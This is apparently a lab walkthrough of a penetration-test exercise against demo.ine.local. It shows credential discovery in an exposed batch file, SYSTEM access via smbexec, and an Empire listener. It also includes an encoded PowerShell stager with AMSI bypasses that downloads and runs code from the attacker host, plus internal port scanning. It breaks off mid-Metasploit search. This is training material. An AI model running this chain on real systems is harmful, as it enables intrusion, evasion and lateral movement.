Leveraging PowerShell During Exploitation
Overview
Scenario
You have been tasked by an organization to conduct a penetration test. Suppose that the organization’s internet-facing machine is accessible at demo.ine.local. There is another machine (fileserver.ine.local) which is not directly accessible.
Task: Perform remote exploitation and post-exploitation tasks on vulnerable systems, gain access to both machines and retrieve the flag!
Learning Objectives
Identify vulnerabilities from a remote exploitation perspective.
Exploit discovered vulnerabilities.
Obtain access to machines (that are not directly accessible)
Use PowerShell and related tools for tasks where applicable.
Recommended tools
- Empire
- Smbexec
- Nmap
- Metasploit
Tasks
Task 1: Identify a vulnerability in an internet-facing System. Use that vulnerability to obtain access and execute remote commands
One of the systems accessible on demo.ine.local contains a vulnerability or misconfiguration. Identify the vulnerability or misconfiguration and obtain access to the vulnerable target with the ability execute commands.
Task 2: Use Empire to obtain a connection from the target via an Empire Agent
Using your ability to execute remote commands on the vulnerable system, use Empire to generate a PowerShell-based stager and obtain an agent connection from the target, and furthermore conduct some recon about the system and internal network using Empire modules.
Task 3: Exploit a second system that is not directly accessible.
Use the compromised system as a pivot to exploit the fileserver.ine.local machine.
My Lab Experience
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| root@attackdefense:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.1.0.7 netmask 255.255.0.0 broadcast 10.1.255.255
ether 02:42:0a:01:00:07 txqueuelen 0 (Ethernet)
RX packets 1790 bytes 161499 (157.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1973 bytes 1902488 (1.8 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.16.2 netmask 255.255.255.0 broadcast 10.10.16.255
ether 02:42:0a:0a:10:02 txqueuelen 0 (Ethernet)
RX packets 12 bytes 908 (908.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
|
Kali Linux: 10.10.16.2
1
2
3
4
5
6
7
8
9
10
11
12
| root@attackdefense:~# cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.1.0.7 attackdefense.com attackdefense
127.0.0.1 AttackDefense-Kali
10.10.16.2 attackdefense.com attackdefense
10.0.26.27 demo.ine.local
10.0.20.241 fileServer.ine.local
|
10.0.26.27 demo.ine.local
10.0.20.241 fileServer.ine.local
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| root@attackdefense:~# ping -c 4 demo.ine.local
PING demo.ine.local (10.0.28.198) 56(84) bytes of data.
64 bytes from demo.ine.local (10.0.28.198): icmp_seq=1 ttl=125 time=4.04 ms
64 bytes from demo.ine.local (10.0.28.198): icmp_seq=2 ttl=125 time=2.90 ms
64 bytes from demo.ine.local (10.0.28.198): icmp_seq=3 ttl=125 time=2.74 ms
64 bytes from demo.ine.local (10.0.28.198): icmp_seq=4 ttl=125 time=2.83 ms
--- demo.ine.local ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 2.738/3.126/4.036/0.528 ms
root@attackdefense:~# ping -c 4 fileServer.ine.local
PING fileServer.ine.local (10.0.28.115) 56(84) bytes of data.
--- fileServer.ine.local ping statistics ---
4 packets transmitted, 0 received, 100% packet loss, time 3075ms
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| root@attackdefense:~# nmap demo.ine.local
Starting Nmap 7.92 ( https://nmap.org ) at 2024-06-15 12:25 IST
Nmap scan report for demo.ine.local (10.0.26.27)
Host is up (0.0028s latency).
Not shown: 992 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| root@attackdefense:~# nmap -p- demo.ine.local
Starting Nmap 7.92 ( https://nmap.org ) at 2024-06-15 12:26 IST
Nmap scan report for demo.ine.local (10.0.26.27)
Host is up (0.0028s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
4983/tcp open unknown
5985/tcp open wsman
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49173/tcp open unknown
49174/tcp open unknown
49180/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 21.01 seconds
|
1
| http://10.0.26.27:4983/
|
1
| @echo off net use "\\fileserver\C$" /user:Administrator abc_123321!@# if exist "\\fileserver\C$\Program_Files\MSBuild\ErrorLog.txt" ( echo "Copying errors\..." copy "\\fileserver\C$\Program_Files\MSBuild\ErrorLog.txt" C:\Users\local_admin\Logs\Host1\ del "\\fileserver\C$\Program_Files\MSBuild\ErrorLog.txt" ) else ( echo "No errors!" ) net use "\\fileserver\C$" /delete
|
Find credential
1
| Administrator abc_123321!@#
|
1
2
3
4
5
6
| root@attackdefense:~/Desktop/tools/portable# find / -name smbexec.py
/root/impacket/examples/smbexec.py
find: ‘/proc/tty/driver’: Permission denied
/usr/lib/python3/dist-packages/cme/protocols/smb/smbexec.py
/usr/local/bin/smbexec.py
/usr/share/doc/python3-impacket/examples/smbexec.py
|
SmbExec/ScExec
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| root@attackdefense:~# smbexec.py 'Administrator:abc_123321!@#'@10.0.26.27
Impacket v0.9.25.dev1+20220131.200424.badf09d - Copyright 2021 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . : ap-southeast-1.compute.internal
Link-local IPv6 Address . . . . . : fe80::b870:ab1f:5f69:9cd0%13
IPv4 Address. . . . . . . . . . . : 10.0.26.27
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 10.0.16.1
Tunnel adapter isatap.ap-southeast-1.compute.internal:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : ap-southeast-1.compute.internal
|
Network Address: 10.0.16.0
1
| root@attackdefense:~# powershell-empire server
|
1
| root@attackdefense:~# powershell-empire client
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
| (Empire) > uselistener http
Author @harmj0y
Description Starts a http[s] listener (PowerShell or Python) that uses a GET/POST
approach.
Name HTTP[S]
┌Record Options────┬─────────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name │ Value │ Required │ Description │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ BindIP │ 0.0.0.0 │ True │ The IP to bind to on the control │
│ │ │ │ server. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ CertPath │ │ False │ Certificate path for https │
│ │ │ │ listeners. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Cookie │ PxALwiuAQykPeAJ │ False │ Custom Cookie Name │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultDelay │ 5 │ True │ Agent delay/reach back interval (in │
│ │ │ │ seconds). │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultJitter │ 0.0 │ True │ Jitter in agent reachback interval │
│ │ │ │ (0.0-1.0). │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultLostLimit │ 60 │ True │ Number of missed checkins before │
│ │ │ │ exiting │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultProfile │ /admin/get.php,/news.php,/login/pro │ True │ Default communication profile for │
│ │ cess.php|Mozilla/5.0 (Windows NT │ │ the agent. │
│ │ 6.1; WOW64; Trident/7.0; rv:11.0) │ │ │
│ │ like Gecko │ │ │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Headers │ Server:Microsoft-IIS/7.5 │ True │ Headers for the control server. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Host │ http://10.1.0.7 │ True │ Hostname/IP for staging. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ KillDate │ │ False │ Date for the listener to exit │
│ │ │ │ (MM/dd/yyyy). │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Launcher │ powershell -noP -sta -w 1 -enc │ True │ Launcher string. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Name │ http │ True │ Name for the listener. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Port │ │ True │ Port for the listener. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy │ default │ False │ Proxy to use for request (default, │
│ │ │ │ none, or other). │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds │ default │ False │ Proxy credentials │
│ │ │ │ ([domain\]username:password) to use │
│ │ │ │ for request (default, none, or │
│ │ │ │ other). │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ SlackURL │ │ False │ Your Slack Incoming Webhook URL to │
│ │ │ │ communicate with your Slack │
│ │ │ │ instance. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ StagerURI │ │ False │ URI for the stager. Must use │
│ │ │ │ /download/. Example: │
│ │ │ │ /download/stager.php │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ StagingKey │ eA9TaKPo>i(%fUk2s|b_t7-V)5p4~jGL │ True │ Staging key for initial agent │
│ │ │ │ negotiation. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent │ default │ False │ User-agent string to use for the │
│ │ │ │ staging request (default, none, or │
│ │ │ │ other). │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ WorkingHours │ │ False │ Hours for the agent to operate │
│ │ │ │ (09:00-17:00). │
└──────────────────┴─────────────────────────────────────┴──────────┴─────────────────────────────────────┘
(Empire: uselistener/http) > set Host 10.10.16.2
[*] Set Host to 10.10.16.2
(Empire: uselistener/http) > set Port 8888
[*] Set Port to 8888
(Empire: uselistener/http) > execute
[+] Listener http successfully started
(Empire: uselistener/http) > listeners
┌Listeners List──────┬───────────────────┬─────────────────────────────────────────┬─────────┐
│ ID │ Name │ Module │ Listener Category │ Created At │ Enabled │
├────┼──────┼────────┼───────────────────┼─────────────────────────────────────────┼─────────┤
│ 1 │ http │ http │ client_server │ 2024-06-15 15:33:45 IST (7 seconds ago) │ True │
└────┴──────┴────────┴───────────────────┴─────────────────────────────────────────┴─────────┘
|
注意:Host部分直接写IP地址,前面不要加http://,不然会出现网络错误。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
| (Empire: listeners) > usestager multi/launcher
Author @harmj0y
Description Generates a one-liner stage0 launcher for Empire.
Name multi/launcher
┌Record Options────┬────────────────────┬──────────┬─────────────────────────────────────┐
│ Name │ Value │ Required │ Description │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ Base64 │ True │ True │ Switch. Base64 encode the output. │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses │ mattifestation etw │ False │ Bypasses as a space separated list │
│ │ │ │ to be prepended to the launcher │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ Language │ powershell │ True │ Language of the stager to generate. │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener │ │ True │ Listener to generate stager for. │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate │ False │ False │ Switch. Obfuscate the launcher │
│ │ │ │ powershell code, uses the │
│ │ │ │ ObfuscateCommand for obfuscation │
│ │ │ │ types. For powershell only. │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1 │ False │ The Invoke-Obfuscation command to │
│ │ │ │ use. Only used if Obfuscate switch │
│ │ │ │ is True. For powershell only. │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ OutFile │ │ False │ Filename that should be used for │
│ │ │ │ the generated output. │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy │ default │ False │ Proxy to use for request (default, │
│ │ │ │ none, or other). │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds │ default │ False │ Proxy credentials │
│ │ │ │ ([domain\]username:password) to use │
│ │ │ │ for request (default, none, or │
│ │ │ │ other). │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ SafeChecks │ True │ True │ Switch. Checks for LittleSnitch or │
│ │ │ │ a SandBox, exit the staging process │
│ │ │ │ if true. Defaults to True. │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ StagerRetries │ 0 │ False │ Times for the stager to retry │
│ │ │ │ connecting. │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent │ default │ False │ User-agent string to use for the │
│ │ │ │ staging request (default, none, or │
│ │ │ │ other). │
└──────────────────┴────────────────────┴──────────┴─────────────────────────────────────┘
(Empire: usestager/multi/launcher) > set Listener http
[*] Set Listener to http
(Empire: usestager/multi/launcher) > execute
powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAHIAUwBJAE8ATgBUAEEAQgBMAGUALgBQAFMAVgBlAFIAcwBJAG8AbgAuAE0AQQBqAG8AcgAgAC0ARwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBiAEwAWQAuAEcAZQB0AFQAWQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBmAC4ARwBFAFQARgBJAEUATABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAdABWAEEATAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AEUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgAiAEcAZQB0AEYAaQBlAGAAbABkACIAKAAnAG0AXwBlACcAKwAnAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuACcAKwAnAFAAdQBiAGwAaQBjACwAJwArACcASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQAnACsAJwBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAJwArACcAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgAiAEcAZQB0AEYAaQBlAGAAbABkACIAKAAnAGUAdAAnACsAJwB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgAnACsAJwBsAGkAYwAsAFMAJwArACcAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwBZAFMAVABFAE0ALgBOAGUAdAAuAFMAZQBSAFYASQBDAEUAUABvAEkATgB0AE0AQQBOAEEARwBlAFIAXQA6ADoARQB4AHAARQBDAFQAMQAwADAAQwBvAG4AVABJAG4AVQBlAD0AMAA7ACQAMgA3AEMARQA9AE4ARQBXAC0ATwBiAGoAZQBDAFQAIABTAHkAUwB0AGUATQAuAE4AZQBUAC4AVwBFAEIAQwBMAGkAZQBOAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQBYAFQALgBFAE4AQwBvAGQASQBOAGcAXQA6ADoAVQBOAGkAQwBPAGQAZQAuAEcAZQB0AFMAdABSAEkAbgBHACgAWwBDAE8ATgBWAGUAUgB0AF0AOgA6AEYAcgBvAE0AQgBBAFMARQA2ADQAUwB0AFIAaQBOAEcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAEwAZwBBAHgAQQBEAEEAQQBMAGcAQQB4AEEARABZAEEATABnAEEAeQBBAEQAbwBBAE8AQQBBADQAQQBEAGcAQQBPAEEAQQA9ACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkADIANwBjAGUALgBIAEUAQQBEAEUAUgBTAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAAyADcAYwBFAC4AUABSAE8AeAB5AD0AWwBTAHkAcwBUAEUAbQAuAE4AZQB0AC4AVwBlAEIAUgBlAFEAVQBlAHMAdABdADoAOgBEAGUARgBBAHUATABUAFcAZQBCAFAAUgBvAFgAeQA7ACQAMgA3AEMAZQAuAFAAUgBPAFgAeQAuAEMAUgBlAGQARQBuAFQAaQBhAEwAUwAgAD0AIABbAFMAeQBTAFQARQBtAC4ATgBFAHQALgBDAHIARQBkAEUAbgB0AGkAQQBMAEMAQQBDAGgARQBdADoAOgBEAEUAZgBBAFUAbAB0AE4AZQBUAHcATwByAGsAQwByAEUARABFAE4AVABpAEEATABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkADIANwBjAGUALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAFQAZQBNAC4AVABFAFgAdAAuAEUAbgBjAG8AZABJAE4ARwBdADoAOgBBAFMAQwBJAEkALgBHAGUAVABCAFkAVABFAHMAKAAnAGUAQQA5AFQAYQBLAFAAbwA+AGkAKAAlAGYAVQBrADIAcwB8AGIAXwB0ADcALQBWACkANQBwADQAfgBqAEcATAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQBSAGcAUwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AE4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAFgAbwBSACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkADIANwBDAEUALgBIAEUAYQBEAEUAcgBTAC4AQQBEAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAFAAeABBAEwAdwBpAHUAQQBRAHkAawBQAGUAQQBKAD0ARgAvAFAARgBKADYAbABwADMAawBkAEIAcwBmAHMAcABQAG0AKwA0AEUAeABGAHMASwBiADAAPQAiACkAOwAkAEQAQQB0AEEAPQAkADIANwBjAEUALgBEAE8AVwBOAEwATwBBAEQARABBAFQAQQAoACQAUwBFAFIAKwAkAFQAKQA7ACQAaQB2AD0AJABkAEEAVABhAFsAMAAuAC4AMwBdADsAJABEAGEAVABBAD0AJABEAEEAVABhAFsANAAuAC4AJABEAGEAdABhAC4AbABlAG4ARwB0AGgAXQA7AC0ASgBPAGkAbgBbAEMAaABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
(Empire: usestager/multi/launcher) >
|
在smbexec获取的shell中执行上面的PowerShell代码。
1
2
3
4
5
6
7
8
9
| [+] Plugin csharpserver ran successfully!
[+] empireadmin connected to socketio
[*] Starting listener 'http'
[+] Listener successfully started!
[*] Sending POWERSHELL stager (stage 1) to 10.0.26.27
[*] New agent W3986BFX checked in
[+] Initial agent W3986BFX from 10.0.26.27 now active (Slack)
[*] Sending agent (stage 2) to W3986BFX at 10.0.26.27
Server >
|
1
2
3
4
5
6
7
8
9
10
| [+] New agent W3986BFX checked in
[*] Sending agent (stage 2) to W3986BFX at 10.0.26.27
(Empire: usestager/multi/launcher) > agents
┌Agents──────────┬────────────┬─────────────┬──────────────────┬────────────┬──────┬───────┬─────────────────────────┬──────────┐
│ ID │ Name │ Language │ Internal IP │ Username │ Process │ PID │ Delay │ Last Seen │ Listener │
├────┼───────────┼────────────┼─────────────┼──────────────────┼────────────┼──────┼───────┼─────────────────────────┼──────────┤
│ 1 │ W3986BFX* │ powershell │ 10.0.26.27 │ WORKGROUP\SYSTEM │ powershell │ 2128 │ 5/0.0 │ 2024-06-15 15:41:40 IST │ http │
│ │ │ │ │ │ │ │ │ (4 seconds ago) │ │
└────┴───────────┴────────────┴─────────────┴──────────────────┴────────────┴──────┴───────┴─────────────────────────┴──────────┘
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
| (Empire: agents) > usemodule powershell/situational_awareness/host/computerdetails
Author @JosephBialek
Background True
Comments https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-
ComputerDetails.ps1
Description Enumerates useful information on the system. By default, all checks
are run.
Language powershell
Name powershell/situational_awareness/host/computerdetails
NeedsAdmin True
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1082
┌Record Options──┬────────────┬──────────┬─────────────────────────────────────┐
│ Name │ Value │ Required │ Description │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ 4624 │ │ False │ Switch. Only return 4624 logon │
│ │ │ │ information (logons to this │
│ │ │ │ machine). │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ 4648 │ │ False │ Switch. Only return 4648 logon │
│ │ │ │ information (RDP to another │
│ │ │ │ machine). │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ Agent │ │ True │ Agent to run module on. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ AppLocker │ │ False │ Switch. Only return AppLocker logs. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ Limit │ 100 │ False │ Limit the number of event log │
│ │ │ │ entries returned. Defaults to 100 │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ OutputFunction │ Out-String │ False │ PowerShell's output function to use │
│ │ │ │ ("Out-String", "ConvertTo-Json", │
│ │ │ │ "ConvertTo-Csv", "ConvertTo-Html", │
│ │ │ │ "ConvertTo-Xml"). │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ PSScripts │ │ False │ Switch. Only return PowerShell │
│ │ │ │ scripts run from operational log. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ SavedRDP │ │ False │ Switch. Only return saved RDP │
│ │ │ │ connections. │
└────────────────┴────────────┴──────────┴─────────────────────────────────────┘
(Empire: usemodule/powershell/situational_awareness/host/computerdetails) > set Agent W3986BFX
[*] Set Agent to W3986BFX
(Empire: usemodule/powershell/situational_awareness/host/computerdetails) > execute
[*] Tasked W3986BFX to run Task 1
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
| (Empire: agents) > interact W3986BFX
[*] Task 1 results received
Event ID 4624 (Logon):
LogonType : 3
NewLogonAccountName : Administrator
SourcePort : 42178
SourceNetworkAddress : 10.10.16.2
Times : {6/15/2024 9:58:47 AM}
LogSource : Security
SourceAccountName : -
WorkstationName : -
Count : 1
SourceDomainName : -
NewLogonAccountDomain : ATTACKDEFENSE
LogType : 4624
LogonType : 3
NewLogonAccountName : Administrator
SourcePort : -
SourceNetworkAddress : -
Times : {1/12/2022 11:29:12 AM}
LogSource : Security
SourceAccountName : -
WorkstationName : attackdefense
Count : 1
SourceDomainName : -
NewLogonAccountDomain : ATTACKDEFENSE
LogType : 4624
LogonType : 10
NewLogonAccountName : Administrator
SourcePort : 0
SourceNetworkAddress : 172.104.52.153
Times : {1/12/2022 11:29:13 AM}
LogSource : Security
SourceAccountName : ATTACKDEFENSE$
WorkstationName : ATTACKDEFENSE
Count : 1
SourceDomainName : WORKGROUP
NewLogonAccountDomain : ATTACKDEFENSE
LogType : 4624
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
| (Empire: W3986BFX) > usemodule powershell/situational_awareness/network/portscan
[*] Set Agent to W3986BFX
Author Rich Lundeen
Background True
Comments https://github.com/mattifestation/PowerSploit/blob/master/Recon/Invoke
-Portscan.ps1
Description Does a simple port scan using regular sockets, based (pretty) loosely
on nmap.
Language powershell
Name powershell/situational_awareness/network/portscan
NeedsAdmin False
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1046
┌Record Options──┬────────────┬──────────┬─────────────────────────────────────┐
│ Name │ Value │ Required │ Description │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ Agent │ W3986BFX │ True │ Agent to run module on. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ AllformatsOut │ │ False │ Output file of all formats. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ ExcludeHosts │ │ False │ Exclude thsee comma separated │
│ │ │ │ hosts. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ GrepOut │ │ False │ Greppable (.gnmap) output file. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ HostFile │ │ False │ Input hosts from file (on the │
│ │ │ │ target) │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ Hosts │ │ False │ Hosts to scan. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ Open │ True │ False │ Switch. Only show hosts with open │
│ │ │ │ ports. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ OutputFunction │ Out-String │ False │ PowerShell's output function to use │
│ │ │ │ ("Out-String", "ConvertTo-Json", │
│ │ │ │ "ConvertTo-Csv", "ConvertTo-Html", │
│ │ │ │ "ConvertTo-Xml"). │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ PingOnly │ │ False │ Switch. Ping only, don't scan for │
│ │ │ │ ports. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ Ports │ │ False │ Comma separated ports to scan for. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ ReadableOut │ │ False │ Readable (.nmap) output file. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ SkipDiscovery │ │ False │ Switch. Treat all hosts as online. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ TopPorts │ │ False │ Scan for X top ports, default 50. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ XmlOut │ │ False │ .XML output file. │
└────────────────┴────────────┴──────────┴─────────────────────────────────────┘
(Empire: usemodule/powershell/situational_awareness/network/portscan) > set Hosts 10.0.20.241
[*] Set Hosts to 10.0.20.241
(Empire: usemodule/powershell/situational_awareness/network/portscan) > execute
[*] Tasked W3986BFX to run Task 2
[*] Task 2 results received
Job started: P4MCXN
[*] Task 2 results received
Hostname OpenPorts
-------- ---------
10.0.20.241 80,3389,445,139,135
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
| root@attackdefense:~# msfconsole -q
msf6 > search web_delivery
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
